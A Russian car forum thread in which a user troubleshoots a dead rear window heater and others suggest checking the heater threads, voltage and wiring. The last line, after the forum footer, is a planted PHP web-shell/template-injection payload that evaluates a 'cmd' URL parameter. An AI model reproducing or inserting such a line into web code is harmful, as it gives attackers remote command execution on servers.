+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Обогрев Заднего Стекла


  1. #1
    Мимо проходил kir is on a distinguished road Аватар для kir
    Регистрация
    22.01.2009
    Сообщений
    9
    перестал работать обогрев заднего стекла, открыл блок предохранителей и обнаружил. что предохранитель целый, но не на номинальный ток защиты, т.е. не на 20, а на 25 А. Использовал подогрев довольно часто, очевидно из-за неноминального предохранителя сгорело реле. Подскажите, где оно расположено и как оно выглядит. Не могу найти подробного описания в Инете.
    Если можно, дайте ссылку, если кто-нибудь уже сталкивался с такой проблемой и успешно её решил.

  2. #2
    GTI-Racing svs093 is on a distinguished road Аватар для svs093
    Регистрация
    05.03.2009
    Сообщений
    5
    Возможно нитки на самом стекле перегорели, оцени визуально, нитки целы ??

  3. #3
    Вот глянул электросхему – нет в цепи обогрева заднего окна релюшки. Меряйте прибором в местах подключения нити наличие напряжения, если есть, отключите и померяйте сопротивление нити на обрыв.

  4. #4
    Вот глянул электросхему – нет в цепи обогрева заднего окна релюшки. Меряйте прибором в местах подключения нити наличие напряжения, если есть, отключите и померяйте сопротивление нити на обрыв.

  5. #5
    У меня предохранитель целый, кнопка при включении светится, но обогрев не работет. Разобрал обшивку задней стойки, к обогреву было подключенно радио
    ( которое не работало), но провода (+) к обогреву я так и не нашёл, (-) к корпусу есть, а плюс исчез. Буду снимать сиденья, и разбирать салон, может найду.
    Разбирал раньше, и между делом интересовался куда, какие провода идут. На тот момент вроде разобрался, но за задним сиденьем и в задней стойке нужного провода нет.В заднем крыле тоже.
    Кстати, у меня в багажнике джетты стоит подсветка багажника, не работала по причине неработающей лампочки и закрашенного плафона. Если кто в курсе? От какой кнопки она срабатывала? У меня ни кнопки, ни отверстий нет.

+ Ответить в теме

Похожие темы

  1. "Выключатель фар без птф, Кнопка обогрева заднего стекла"
    от Roll в разделе Покупка и продажа запчастей
    Ответов: 41
    Последнее сообщение: 23.07.2014, 11:41
  2. Форсунка Заднего Стекла!
    от TaPaKaH в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 28.04.2009, 16:30
  3. Обогрев Сидений
    от Гольфстрим в разделе Электрика
    Ответов: 0
    Последнее сообщение: 20.01.2009, 11:09
  4. Не работает обогрев сиденья водителя
    от Verdik в разделе Электрика
    Ответов: 1
    Последнее сообщение: 10.12.2008, 00:21
  5. СТЕКЛА ФАР ГОЛЬФ 4
    от GAD в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 42
    Последнее сообщение: 25.02.2008, 01:44

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}